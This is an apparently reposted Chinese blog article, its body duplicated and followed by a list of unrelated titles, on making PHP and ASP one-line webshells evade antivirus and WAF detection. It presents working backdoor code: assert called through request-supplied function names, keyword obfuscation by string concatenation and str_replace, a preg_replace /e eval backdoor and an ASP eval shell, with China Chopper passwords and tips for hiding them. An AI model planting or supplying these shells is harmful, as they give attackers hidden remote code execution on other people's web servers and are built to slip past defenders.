关于php一句话免杀的分析
来源:互联网 发布:填充asp表单数据 编辑:程序博客网 时间:2024/05/16 06:58
一开始想这样:
<?php $_GET['ts7']($_POST['cmd']);?>
客户端用菜刀,密码cmd,url为test.php?ts7=assert
这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert
可以都用post:
<?php $_POST['ts7']($_POST['cmd']);?>
在菜刀说明用<O>ts7=assert</O>post附加数据.
这中间考虑了这些:
<?php $ts7 = (string)key($_POST); $ts7($_POST[’assert']); ?>
猛然发现assert这个关键词又出现了。。
既然字符串可以直接这样用,那还可以这样:
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["cmd"]); ?>
或者用
$a = str_replace(x,"",axsxxsxexrxxt)
以上说来,感觉
<?php $_POST['ts7']($_POST['cmd']);?>
算是最难查到的一种了。
==========================
ywisax 在论坛上又发了这个:
不知是谁写的 百度了一堆 都没写出处,貌似是lcx写的:
asp版的,这是utf-8编码,自己看着弄吧
www.xxxx.com <”CODEPAGE=”65001″%> <% var lcx = {‘名字’: Request.form(‘#’), ‘性别’: eval, ‘年龄’: ‘18′, ‘昵称’: ‘请叫我一声老大’}; lcx.性别((lcx.名字)+”); %> 用冰狐就行了
<?php @preg_replace(“/[email]/e”,$_POST['h'],”error”); ?>
菜刀附加数据:
<O>h=@eval($_POST[c]);</O>
[email]和error你看着换吧,怎么隐蔽怎么来
密码c
作者 随风.潜入夜
<?php $_GET['ts7']($_POST['cmd']);?>
客户端用菜刀,密码cmd,url为test.php?ts7=assert
这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert
可以都用post:
<?php $_POST['ts7']($_POST['cmd']);?>
在菜刀说明用<O>ts7=assert</O>post附加数据.
这中间考虑了这些:
<?php $ts7 = (string)key($_POST); $ts7($_POST[’assert']); ?>
猛然发现assert这个关键词又出现了。。
既然字符串可以直接这样用,那还可以这样:
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["cmd"]); ?>
或者用
$a = str_replace(x,"",axsxxsxexrxxt)
以上说来,感觉
<?php $_POST['ts7']($_POST['cmd']);?>
算是最难查到的一种了。
==========================
ywisax 在论坛上又发了这个:
不知是谁写的 百度了一堆 都没写出处,貌似是lcx写的:
asp版的,这是utf-8编码,自己看着弄吧
www.xxxx.com <”CODEPAGE=”65001″%> <% var lcx = {‘名字’: Request.form(‘#’), ‘性别’: eval, ‘年龄’: ‘18′, ‘昵称’: ‘请叫我一声老大’}; lcx.性别((lcx.名字)+”); %> 用冰狐就行了
<?php @preg_replace(“/[email]/e”,$_POST['h'],”error”); ?>
菜刀附加数据:
<O>h=@eval($_POST[c]);</O>
[email]和error你看着换吧,怎么隐蔽怎么来
密码c
作者 随风.潜入夜
- 关于php一句话免杀的分析
- php一句话免杀
- 2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- 免杀一句话
- 免杀一句话2
- 自用php一句话木马绝对免杀没有任何关键字
- php一句话后门分析
- 关于php一句话木马
- 关于PHP一句话木马
- 介绍 RWSH – Ray’s Web SHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
- Zend加密 免杀PHP一句话藐视所有IIS防御软件
- 免杀的php webshell
- php的一句话木马
- 关于【CSDN免积分下载器】的分析
- 关于typedef一句话的解释
- 关于一句话的乱想
- 关于免杀的一些介绍
- Platform Dependent Compilation 多平台兼容性使用注意事项
- Android应用定制皮肤
- 数据库索引与并发
- Html中的textarea 的内容不居左显示问题
- DataSet导出CSV格式(ASP.NET,C#) .
- 关于php一句话免杀的分析
- 创建range分区
- 软件打包问题
- java去除数组中的重复元素
- protel99se 总结(转载)
- Android开发者应该深入学习的10个开源应用项目
- 多路复用
- ASP.NET MVC 学习 --- HTML5 新特性及标签
- Oracle密码过期the password has expired